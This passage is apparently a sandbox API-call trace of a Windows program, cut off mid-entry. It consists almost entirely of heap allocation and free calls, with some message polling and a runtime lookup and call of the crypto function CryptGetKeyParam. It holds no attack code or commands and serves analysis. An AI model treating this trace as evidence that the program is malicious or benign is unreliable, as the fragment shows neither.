RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0111.969] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0111.970] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0111.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.971] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0111.971] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0111.971] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0111.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0111.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0111.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0111.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0111.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0111.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0111.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0111.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0111.975] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0111.975] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e27b0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27b0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0111.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.977] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.978] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: 